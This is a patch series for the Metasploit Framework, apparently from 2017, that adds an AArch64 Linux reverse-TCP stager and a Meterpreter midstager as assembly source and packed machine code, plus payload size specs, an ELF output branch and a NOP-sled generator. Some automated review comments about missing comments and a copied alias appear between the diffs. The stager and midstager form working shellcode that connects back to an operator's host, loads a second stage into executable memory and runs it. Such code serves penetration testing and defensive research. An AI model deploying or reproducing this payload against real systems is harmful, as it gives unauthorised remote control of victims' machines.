From 6dbe00158fc62017354d1119f587936ebf74acdd Mon Sep 17 00:00:00 2001 From: Tim Date: Mon, 28 Aug 2017 21:11:31 +0800 Subject: [PATCH 1/7] fix stager --- .../linux/aarch64/stager_sock_reverse.s | 18 +++++++------ .../stagers/linux/aarch64/reverse_tcp.rb | 25 +++++++++++-------- 2 files changed, 26 insertions(+), 17 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s index 7c049b8308..7bf02f863e 100644 --- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s +++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s @@ -37,9 +37,10 @@ start: mov x2, #4 mov x8, SYS_READ svc 0 - cbz w0, failed + cmn x0, #0x1 + beq failed - ldr x2, [sp,#0] + ldr w2, [sp,#0] /* Page-align, assume <4GB */ lsr x2, x2, #12 @@ -53,12 +54,13 @@ start: mov x3, #34 mov x4, xzr mov x5, xzr - /* call mmap() */ - movi x8, SYS_MMAP + mov x8, SYS_MMAP svc 0 + cmn x0, #0x1 + beq failed /* Grab the saved size, save the address */ - ldr x4, [sp] + ldr w4, [sp] /* Save the memory address */ str x0, [sp] @@ -73,13 +75,15 @@ read_loop: mov x2, x4 mov x8, SYS_READ svc 0 + cmn x0, #0x1 + beq failed add x3, x3, x0 subs x4, x4, x0 bne read_loop /* Go to shellcode */ - ldr x30, [sp] - ret + ldr x0, [sp] + blr x0 failed: mov x0, 0 diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index 2ebf658320..e2faeb7cbf 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -33,8 +33,8 @@ module MetasploitModule { 'Offsets' => { - 'LPORT' => [ 186, 'n' ], - 'LHOST' => [ 188, 'ADDR' ], + 'LPORT' => [ 206, 'n' ], + 'LHOST' => [ 208, 'ADDR' ], }, 'Payload' => [ 
@@ -45,19 +45,20 @@ module MetasploitModule 0xd28018c8, # mov x8, #0xc6 // #198 0xd4000001, # svc #0x0 0xaa0003ec, # mov x12, x0 - 0x10000501, # adr x1, b8 + 0x100005a1, # adr x1, cc 0xd2800202, # mov x2, #0x10 // #16 0xd2801968, # mov x8, #0xcb // #203 0xd4000001, # svc #0x0 - 0x35000420, # cbnz w0, ac + 0x350004c0, # cbnz w0, c0 0xaa0c03e0, # mov x0, x12 0xd10043ff, # sub sp, sp, #0x10 0x910003e1, # mov x1, sp 0xd2800082, # mov x2, #0x4 // #4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 - 0x34000340, # cbz w0, ac - 0xf94003e2, # ldr x2, [sp] + 0xb100041f, # cmn x0, #0x1 + 0x540003c0, # b.eq c0 + 0xb94003e2, # ldr w2, [sp] 0xd34cfc42, # lsr x2, x2, #12 0x91000442, # add x2, x2, #0x1 0xd374cc42, # lsl x2, x2, #12 @@ -69,7 +70,9 @@ module MetasploitModule 0xaa1f03e5, # mov x5, xzr 0xd2801bc8, # mov x8, #0xde // #222 0xd4000001, # svc #0x0 - 0xf94003e4, # ldr x4, [sp] + 0xb100041f, # cmn x0, #0x1 + 0x54000200, # b.eq c0 + 0xb94003e4, # ldr w4, [sp] 0xf90003e0, # str x0, [sp] 0xaa0003e3, # mov x3, x0 0xaa0c03e0, # mov x0, x12 @@ -77,11 +80,13 @@ module MetasploitModule 0xaa0403e2, # mov x2, x4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 + 0xb100041f, # cmn x0, #0x1 + 0x540000c0, # b.eq c0 0x8b000063, # add x3, x3, x0 0xeb000084, # subs x4, x4, x0 - 0x54ffff21, # b.ne 84 - 0xf94003fe, # ldr x30, [sp] - 0xd65f03c0, # ret + 0x54fffee1, # b.ne 90 + 0xf94003e0, # ldr x0, [sp] + 0xd63f0000, # blr x0 0xd2800000, # mov x0, #0x0 // #0 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0 From a2396991f0ab6a53dbf01e880e931474005adb93 Mon Sep 17 00:00:00 2001 
From: Tim
Date: Tue, 29 Aug 2017 10:22:04 +0800
Subject: [PATCH 2/7] stager not setting up stack
---
 .../shellcode/linux/aarch64/stage_mettle.s | 137 ++++++++++++++++++
 .../stages/linux/aarch64/meterpreter.rb | 109 ++++++++++++++
 2 files changed, 246 insertions(+)
 create mode 100644 external/source/shellcode/linux/aarch64/stage_mettle.s
 create mode 100644 modules/payloads/stages/linux/aarch64/meterpreter.rb
diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s
new file mode 100644
index 0000000000..b10f4b8a32
--- /dev/null
+++ b/external/source/shellcode/linux/aarch64/stage_mettle.s
@@ -0,0 +1,137 @@ +.equ SYS_READ, 0x3f +.equ SYS_MMAP, 0xde +.equ SYS_EXIT, 0x5d + +.equ SIZE, 0xeeeeeeee +.equ ENTRY, 0xffffffff + +start: + adr x2, size + ldr w2, [x2] + mov x10, x2 + + /* Page-align, assume <4GB */ + lsr x2, x2, #12 + add x2, x2, #1 + lsl x2, x2, #12 + + /* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */ + mov x0, xzr + mov x1, x2 + mov x2, #7 + mov x3, #34 + mov x4, xzr + mov x5, xzr + mov x8, SYS_MMAP + svc 0 + + /* Grab the saved size, save the address */ + mov x4, x10 + + /* Save the memory address */ + mov x3, x0 + mov x10, x0 + +read_loop: + /* read(sockfd, buf='x3', nbytes='x4') */ + mov x0, x12 + mov x1, x3 + mov x2, x4 + mov x8, SYS_READ + svc 0 + cbz w0, failed + add x3, x3, x0 + subs x4, x4, x0 + bne read_loop + + /* set up the initial stack */ + /* + + add sp, sp, #80 + mov x4, #109 + eor x5, x5, x5 + stp x4, x5, [sp, #-16]! + + mov x1,#2 + mov x2,sp + mov x3,#0 + + mov x4,#2 + mov x5,sp + mov x6,x12 + mov x7,#0 + mov x8,#0 + mov x9,#7 + mov x10,x10 + mov x11,#0 + mov x12,#0 + + eor x0, x0, x0 + eor x1, x1, x1 + eor x2, x2, x2 + eor x3, x3, x3 + stp x4, x5, [sp, #-16]! + stp x6, x7, [sp, #-16]! + stp x7, x8, [sp, #-16]! + stp x9, x10, [sp, #-16]! + stp x11, x12, [sp, #-16]! + */ + + adr x0, entry + ldr x0, [x0] + // entry_offset + mmap + add x0, x0, x10 + + mov x8, x0 + + + /* Set up the fake stack. + For whatever reason, aarch64 binaries really want AT_RANDOM + to be available. */ + /* AT_NULL */ + eor x0, x0, x0 + eor x1, x1, x1 + stp x0, x1, [sp, #-16]! + /* AT_RANDOM */ + mov x2, #25 + mov x3, sp + stp x2, x3, [sp, #-16]! + + /* argc, argv[0], argv[1], envp */ + /* ideally these could all be empty, but unfortunately + we have to keep the stack aligned. it's easier to + just push an extra argument than care... */ + stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ + mov x0, 1 + mov x1, sp + stp x0, x1, [sp, #-16]! 
/* argc = 1, argv[0] = "" */ + + br x8 + + /* + mov x0, #109 + mov x1, x12 + stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ + /* mov x0, 2 + mov x1, sp + stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + + /* + blr x8 + */ + +failed: + mov x0, 0 + mov x8, SYS_EXIT + svc 0 + +.balign 16 +size: + .word SIZE + .word 0 +entry: + .word ENTRY + .word 0 +m: +.word 0x0000006d +.word 0x00000000 diff --git a/modules/payloads/stages/linux/aarch64/meterpreter.rb b/modules/payloads/stages/linux/aarch64/meterpreter.rb new file mode 100644 index 0000000000..43a0ca6615 --- /dev/null +++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb 
@@ -0,0 +1,109 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/base/sessions/meterpreter_aarch64_linux' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'rex/elfparsey' + +module MetasploitModule + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter', + 'Description' => 'Inject the mettle server payload (staged)', + 'Author' => [ + 'Adam Cammack ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux + ) + ) + end + + def elf_ep(payload) + elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload)) + elf.elf_header.e_entry + end + + def handle_intermediate_stage(conn, payload) + entry_offset = elf_ep(payload) + + # Generated from external/source/shellcode/linux/aarch64/stage_mettle.s + midstager = [ + + + + 0x10000582, # adr x2, b0 + 0xb9400042, # ldr w2, [x2] + 0xaa0203ea, # mov x10, x2 + 0xd34cfc42, # lsr x2, x2, #12 + 0x91000442, # add x2, x2, #0x1 + 0xd374cc42, # lsl x2, x2, #12 + 0xaa1f03e0, # mov x0, xzr + 0xaa0203e1, # mov x1, x2 + 0xd28000e2, # mov x2, #0x7 // #7 + 0xd2800443, # mov x3, #0x22 // #34 + 0xaa1f03e4, # mov x4, xzr + 0xaa1f03e5, # mov x5, xzr + 0xd2801bc8, # mov x8, #0xde // #222 + 0xd4000001, # svc #0x0 + 0xaa0a03e4, # mov x4, x10 + 0xaa0003e3, # mov x3, x0 + 0xaa0003ea, # mov x10, x0 + 0xaa0c03e0, # mov x0, x12 + 0xaa0303e1, # mov x1, x3 + 0xaa0403e2, # mov x2, x4 + 0xd28007e8, # mov x8, #0x3f // #63 + 0xd4000001, # svc #0x0 + 0x34000260, # cbz w0, a4 + 0x8b000063, # add x3, x3, x0 + 0xeb000084, # subs x4, x4, x0 + 0x54ffff01, # b.ne 44 + 0x10000280, # adr x0, b8 + 0xf9400000, # ldr x0, [x0] + 0x8b0a0000, # add x0, x0, x10 + 0xaa0003e8, # mov x8, x0 + 0xca000000, # eor 
x0, x0, x0 + 0xca010021, # eor x1, x1, x1 + 0xa9bf07e0, # stp x0, x1, [sp,#-16]! + 0xd2800322, # mov x2, #0x19 // #25 + 0x910003e3, # mov x3, sp + 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! + 0xa9bf07e0, # stp x0, x1, [sp,#-16]! + 0xd2800020, # mov x0, #0x1 // #1 + 0x910003e1, # mov x1, sp + 0xa9bf07e0, # stp x0, x1, [sp,#-16]! + 0xd61f0100, # br x8 + 0xd2800000, # mov x0, #0x0 // #0 + 0xd2800ba8, # mov x8, #0x5d // #93 + 0xd4000001, # svc #0x0 + payload.length, + 0x00000000, # .word 0x00000000 + entry_offset, + 0x00000000, # .word 0x00000000 + 0x0000006d, # .word 0x0000006d + 0x00000000, # .word 0x00000000 + 0xd503201f, # nop + 0xd503201f, # nop + ].pack('V*') + + print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)") + print_status("Transmitting intermediate paystager...(#{payload.length} bytes)") + conn.put([midstager.length].pack('V')) + conn.put(midstager) == midstager.length + end + + def generate_stage(opts = {}) + MetasploitPayloads::Mettle.new('aarch64-linux-musl', + generate_config(opts.merge({scheme: 'tcp'}))).to_binary :process_image + end +end From 26f4fa3b09fde2501e8ee732091e23e526dacbf1 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 29 Aug 2017 12:24:05 +0800 Subject: [PATCH 3/7] setup stack --- .../shellcode/linux/aarch64/stage_mettle.s | 100 ++++++------------ .../stages/linux/aarch64/meterpreter.rb | 48 +++++---- 2 files changed, 62 insertions(+), 86 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s index b10f4b8a32..eedf65b677 100644 --- a/external/source/shellcode/linux/aarch64/stage_mettle.s +++ b/external/source/shellcode/linux/aarch64/stage_mettle.s 
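Review bot: `elf_ep` and `handle_intermediate_stage` carry no comments, and the two non-literal entries at the tail of `midstager` (`payload.length` and `entry_offset`) can only be understood by matching them by hand against the `size:` and `entry:` labels at the end of stage_mettle.s. I'd add above `elf_ep` the comment `# e_entry of the mettle ELF image, written into the midstager's entry: slot` and above the array `# The trailing data words fill the size:/entry: slots declared at the end of stage_mettle.s`. The `'Author'` entry `'Adam Cammack '` ends in a trailing space, which looks like an address that was stripped during rendering; worth confirming against the original file.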
@@ -44,81 +44,48 @@ read_loop: subs x4, x4, x0 bne read_loop - /* set up the initial stack */ - /* - - add sp, sp, #80 - mov x4, #109 - eor x5, x5, x5 - stp x4, x5, [sp, #-16]! - - mov x1,#2 - mov x2,sp - mov x3,#0 - - mov x4,#2 - mov x5,sp - mov x6,x12 - mov x7,#0 - mov x8,#0 - mov x9,#7 - mov x10,x10 - mov x11,#0 - mov x12,#0 - - eor x0, x0, x0 - eor x1, x1, x1 - eor x2, x2, x2 - eor x3, x3, x3 - stp x4, x5, [sp, #-16]! - stp x6, x7, [sp, #-16]! - stp x7, x8, [sp, #-16]! - stp x9, x10, [sp, #-16]! - stp x11, x12, [sp, #-16]! - */ - + /* add entry_offset */ adr x0, entry ldr x0, [x0] - // entry_offset + mmap add x0, x0, x10 + mov x14, x0 - mov x8, x0 + /* set up the initial stack */ + mov x0, sp + and sp, x0, #-16 + add sp, sp, #(16 * 6) + /* argc = 2, argv[0] = 'm' */ + mov x0, #2 + mov x1, #109 + str x1, [sp] + mov x1, sp + stp x0, x1, [sp, #-16]! - /* Set up the fake stack. - For whatever reason, aarch64 binaries really want AT_RANDOM - to be available. */ - /* AT_NULL */ - eor x0, x0, x0 - eor x1, x1, x1 - stp x0, x1, [sp, #-16]! - /* AT_RANDOM */ - mov x2, #25 - mov x3, sp - stp x2, x3, [sp, #-16]! + /* argc = 2, argv[1] = 'x12 (sockfd)' */ + mov x2, x12 + mov x3, 0 + stp x2, x3, [sp, #-16]! - /* argc, argv[0], argv[1], envp */ - /* ideally these could all be empty, but unfortunately - we have to keep the stack aligned. it's easier to - just push an extra argument than care... */ - stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ - mov x0, 1 - mov x1, sp - stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + mov x4, 0 + mov x5, #7 /* AT_BASE */ + stp x4, x5, [sp, #-16]! - br x8 + mov x6, x10 + mov x7, #6 /* AT_PAGESZ */ + stp x6, x7, [sp, #-16]! - /* - mov x0, #109 - mov x1, x12 - stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ - /* mov x0, 2 - mov x1, sp - stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + mov x8, #0x1000 + mov x9, #25 /* AT_RANDOM */ + stp x8, x9, [sp, #-16]! 
- /* - blr x8 - */ + mov x10, x10 + mov x11, #0 /* AT_NULL */ + stp x10, x11, [sp, #-16]! + + mov x29, #0 + mov x30, #0 + br x14 failed: mov x0, 0 @@ -132,6 +99,3 @@ size: entry: .word ENTRY .word 0 -m: -.word 0x0000006d -.word 0x00000000 diff --git a/modules/payloads/stages/linux/aarch64/meterpreter.rb b/modules/payloads/stages/linux/aarch64/meterpreter.rb index 43a0ca6615..a585ad2210 100644 --- a/modules/payloads/stages/linux/aarch64/meterpreter.rb +++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb @@ -41,8 +41,7 @@ module MetasploitModule midstager = [ - - 0x10000582, # adr x2, b0 + 0x10000782, # adr x2, f0 0xb9400042, # ldr w2, [x2] 0xaa0203ea, # mov x10, x2 0xd34cfc42, # lsr x2, x2, #12 
@@ -64,36 +63,49 @@ module MetasploitModule 0xaa0403e2, # mov x2, x4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 - 0x34000260, # cbz w0, a4 + 0x34000440, # cbz w0, e0 0x8b000063, # add x3, x3, x0 0xeb000084, # subs x4, x4, x0 0x54ffff01, # b.ne 44 - 0x10000280, # adr x0, b8 + 0x10000480, # adr x0, f8 0xf9400000, # ldr x0, [x0] 0x8b0a0000, # add x0, x0, x10 - 0xaa0003e8, # mov x8, x0 - 0xca000000, # eor x0, x0, x0 - 0xca010021, # eor x1, x1, x1 - 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd2800322, # mov x2, #0x19 // #25 - 0x910003e3, # mov x3, sp - 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! - 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd2800020, # mov x0, #0x1 // #1 + 0xaa0003ee, # mov x14, x0 + 0x910003e0, # mov x0, sp + 0x927cec1f, # and sp, x0, #0xfffffffffffffff0 + 0x910183ff, # add sp, sp, #0x60 + 0xd2800040, # mov x0, #0x2 // #2 + 0xd2800da1, # mov x1, #0x6d // #109 + 0xf90003e1, # str x1, [sp] 0x910003e1, # mov x1, sp 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd61f0100, # br x8 + 0xaa0c03e2, # mov x2, x12 + 0xd2800003, # mov x3, #0x0 // #0 + 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! + 0xd2800004, # mov x4, #0x0 // #0 + 0xd28000e5, # mov x5, #0x7 // #7 + 0xa9bf17e4, # stp x4, x5, [sp,#-16]! + 0xaa0a03e6, # mov x6, x10 + 0xd28000c7, # mov x7, #0x6 // #6 + 0xa9bf1fe6, # stp x6, x7, [sp,#-16]! + 0xd2820008, # mov x8, #0x1000 // #4096 + 0xd2800329, # mov x9, #0x19 // #25 + 0xa9bf27e8, # stp x8, x9, [sp,#-16]! + 0xaa0a03ea, # mov x10, x10 + 0xd280000b, # mov x11, #0x0 // #0 + 0xa9bf2fea, # stp x10, x11, [sp,#-16]! 
+ 0xd280001d, # mov x29, #0x0 // #0 + 0xd280001e, # mov x30, #0x0 // #0 + 0xd61f01c0, # br x14 0xd2800000, # mov x0, #0x0 // #0 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0 + 0xd503201f, # nop + payload.length, 0x00000000, # .word 0x00000000 entry_offset, 0x00000000, # .word 0x00000000 - 0x0000006d, # .word 0x0000006d - 0x00000000, # .word 0x00000000 - 0xd503201f, # nop - 0xd503201f, # nop ].pack('V*') print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)") From 7b71f60ea196747791cf41e42f7de2dc84047488 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 29 Aug 2017 12:42:35 +0800 Subject: [PATCH 4/7] fix the stack --- .../source/shellcode/linux/aarch64/stage_mettle.s | 12 ++++++------ .../payloads/stages/linux/aarch64/meterpreter.rb | 13 +++++-------- 2 files changed, 11 insertions(+), 14 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s index eedf65b677..f149105c1d 100644 --- a/external/source/shellcode/linux/aarch64/stage_mettle.s +++ b/external/source/shellcode/linux/aarch64/stage_mettle.s @@ -60,28 +60,28 @@ read_loop: mov x1, #109 str x1, [sp] mov x1, sp - stp x0, x1, [sp, #-16]! - /* argc = 2, argv[1] = 'x12 (sockfd)' */ mov x2, x12 mov x3, 0 - stp x2, x3, [sp, #-16]! mov x4, 0 mov x5, #7 /* AT_BASE */ - stp x4, x5, [sp, #-16]! mov x6, x10 mov x7, #6 /* AT_PAGESZ */ - stp x6, x7, [sp, #-16]! mov x8, #0x1000 mov x9, #25 /* AT_RANDOM */ - stp x8, x9, [sp, #-16]! mov x10, x10 mov x11, #0 /* AT_NULL */ + stp x10, x11, [sp, #-16]! + stp x8, x9, [sp, #-16]! + stp x6, x7, [sp, #-16]! + stp x4, x5, [sp, #-16]! + stp x2, x3, [sp, #-16]! + stp x0, x1, [sp, #-16]! mov x29, #0 mov x30, #0 diff --git a/modules/payloads/stages/linux/aarch64/meterpreter.rb b/modules/payloads/stages/linux/aarch64/meterpreter.rb index a585ad2210..ec2b24435f 100644 --- a/modules/payloads/stages/linux/aarch64/meterpreter.rb 
+++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb @@ -40,7 +40,6 @@ module MetasploitModule # Generated from external/source/shellcode/linux/aarch64/stage_mettle.s midstager = [ - 0x10000782, # adr x2, f0 0xb9400042, # ldr w2, [x2] 0xaa0203ea, # mov x10, x2 @@ -78,22 +77,22 @@ module MetasploitModule 0xd2800da1, # mov x1, #0x6d // #109 0xf90003e1, # str x1, [sp] 0x910003e1, # mov x1, sp - 0xa9bf07e0, # stp x0, x1, [sp,#-16]! 0xaa0c03e2, # mov x2, x12 0xd2800003, # mov x3, #0x0 // #0 - 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! 0xd2800004, # mov x4, #0x0 // #0 0xd28000e5, # mov x5, #0x7 // #7 - 0xa9bf17e4, # stp x4, x5, [sp,#-16]! 0xaa0a03e6, # mov x6, x10 0xd28000c7, # mov x7, #0x6 // #6 - 0xa9bf1fe6, # stp x6, x7, [sp,#-16]! 0xd2820008, # mov x8, #0x1000 // #4096 0xd2800329, # mov x9, #0x19 // #25 - 0xa9bf27e8, # stp x8, x9, [sp,#-16]! 0xaa0a03ea, # mov x10, x10 0xd280000b, # mov x11, #0x0 // #0 0xa9bf2fea, # stp x10, x11, [sp,#-16]! + 0xa9bf27e8, # stp x8, x9, [sp,#-16]! + 0xa9bf1fe6, # stp x6, x7, [sp,#-16]! + 0xa9bf17e4, # stp x4, x5, [sp,#-16]! + 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! + 0xa9bf07e0, # stp x0, x1, [sp,#-16]! 0xd280001d, # mov x29, #0x0 // #0 0xd280001e, # mov x30, #0x0 // #0 0xd61f01c0, # br x14 @@ -101,7 +100,6 @@ module MetasploitModule 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0 0xd503201f, # nop - payload.length, 0x00000000, # .word 0x00000000 entry_offset, @@ -109,7 +107,6 @@ module MetasploitModule ].pack('V*') print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)") - print_status("Transmitting intermediate paystager...(#{payload.length} bytes)") conn.put([midstager.length].pack('V')) conn.put(midstager) == midstager.length end From ffbf21cb1c9f1c6b1e2cca3154ee877489c13086 Mon Sep 17 00:00:00 2001 
From: Tim Date: Tue, 29 Aug 2017 13:08:40 +0800 Subject: [PATCH 5/7] cleanup --- external/source/shellcode/linux/aarch64/stage_mettle.s | 7 ++----- .../source/shellcode/linux/aarch64/stager_sock_reverse.s | 6 +++--- 2 files changed, 5 insertions(+), 8 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s index f149105c1d..0092c737ef 100644 --- a/external/source/shellcode/linux/aarch64/stage_mettle.s +++ b/external/source/shellcode/linux/aarch64/stage_mettle.s @@ -2,9 +2,6 @@ .equ SYS_MMAP, 0xde .equ SYS_EXIT, 0x5d -.equ SIZE, 0xeeeeeeee -.equ ENTRY, 0xffffffff - start: adr x2, size ldr w2, [x2] @@ -94,8 +91,8 @@ failed: .balign 16 size: - .word SIZE + .word 0 .word 0 entry: - .word ENTRY + .word 0 .word 0 diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s index 7bf02f863e..f8b354fbc5 100644 --- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s +++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s @@ -37,7 +37,7 @@ start: mov x2, #4 mov x8, SYS_READ svc 0 - cmn x0, #0x1 + cmn x0, #0x1 beq failed ldr w2, [sp,#0] @@ -56,7 +56,7 @@ start: mov x5, xzr mov x8, SYS_MMAP svc 0 - cmn x0, #0x1 + cmn x0, #0x1 beq failed /* Grab the saved size, save the address */ @@ -75,7 +75,7 @@ read_loop: mov x2, x4 mov x8, SYS_READ svc 0 - cmn x0, #0x1 + cmn x0, #0x1 beq failed add x3, x3, x0 subs x4, x4, x0 From 195c1e041fdd3a3fa900d7f6a10a9d82b9ff4040 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Tue, 29 Aug 2017 10:09:38 -0500 Subject: [PATCH 6/7] Update payload specs and sizes Adds the new Aarch64 and R payloads fix merge --- modules/payloads/stagers/linux/aarch64/reverse_tcp.rb | 2 +- spec/modules/payloads_spec.rb | 11 +++++++++++ 2 files changed, 12 insertions(+), 1 deletion(-) 
diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index e2faeb7cbf..eb6ad11d09 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -17,7 +17,7 @@ require 'msf/core/handler/reverse_tcp' ### module MetasploitModule - CachedSize = 192 + CachedSize = 212 include Msf::Payload::Stager diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 646a3b041e..687dace6fa 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -4442,6 +4442,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/zarch/meterpreter_reverse_https' end + context 'linux/aarch64/meterpreter/reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/linux/aarch64/reverse_tcp', + 'stages/linux/aarch64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/meterpreter/reverse_tcp' + end + context 'linux/aarch64/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From 86ee77ffb045cb52290ea91f2d955a137cd1c3a5 Mon Sep 17 00:00:00 2001 From: Tim Date: Thu, 31 Aug 2017 18:33:09 +0800 Subject: [PATCH 7/7] add aarch64 nops and fix aarch64 cmdstager --- lib/msf/util/exe.rb | 8 +++++++ modules/nops/aarch64/simple.rb | 43 ++++++++++++++++++++++++++++++++++ 2 files changed, 51 insertions(+) create mode 100644 modules/nops/aarch64/simple.rb diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 7be5510b23..84f211c961 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
@@ -165,6 +165,14 @@ require 'msf/core/exe/segment_appender' # XXX: Add remaining ARMLE systems here end + if arch.index(ARCH_AARCH64) + if plat.index(Msf::Module::Platform::Linux) + return to_linux_aarch64_elf(framework, code) + end + + # XXX: Add remaining AARCH64 systems here + end + if arch.index(ARCH_PPC) if plat.index(Msf::Module::Platform::OSX) return to_osx_ppc_macho(framework, code) diff --git a/modules/nops/aarch64/simple.rb b/modules/nops/aarch64/simple.rb new file mode 100644 index 0000000000..29a0244d80 --- /dev/null +++ b/modules/nops/aarch64/simple.rb @@ -0,0 +1,43 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# SingleByte +# ---------- +# +# This class implements simple NOP generator for AARCH64 +# +### +class MetasploitModule < Msf::Nop + + def initialize + super( + 'Name' => 'Simple', + 'Alias' => 'armle_simple', + 'Description' => 'Simple NOP generator', + 'License' => MSF_LICENSE, + 'Arch' => ARCH_AARCH64) + register_advanced_options( + [ + OptBool.new('RandomNops', [ false, "Generate a random NOP sled", true ]) + ]) + end + + def generate_sled(length, opts) + random = opts['Random'] || datastore['RandomNops'] + nops = [ + 0xd503201f, # nop + 0xaa0103e1, # mov x1, x1 + 0xaa0203e2, # mov x2, x2 + 0x2a0303e3, # mov w3, w3 + 0x2a0403e4, # mov w4, w4 + ] + if random + return ([nops[rand(nops.length)]].pack("V*") * (length/4)) + end + return ([nops[0]].pack("V*") * (length/4)) + end +end \ No newline at end of file
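Review bot: The new `ARCH_AARCH64` branch calls `to_linux_aarch64_elf(framework, code)`, but no definition of that method appears anywhere in this series, so unless it already exists in lib/msf/util/exe.rb the branch raises NoMethodError the first time this path is taken. Worth confirming the helper is present, or adding it in the same commit, before merging. The `# XXX: Add remaining AARCH64 systems here` marker reuses the ARMLE block's wording verbatim; fine if it is tracked like the others. The enclosing method starts and ends outside the hunk.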
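Review bot: The header comment and alias are copied from another NOP module: the banner names the class `SingleByte` and the module registers `'Alias' => 'armle_simple'`, neither of which describes a four-byte AARCH64 NOP generator, and the alias appears to duplicate the ARMLE module's (whether that matters depends on how Alias is used for lookup). I'd change the banner to `# Simple` and the registration to `'Alias' => 'aarch64_simple'`. The file also ends without a trailing newline.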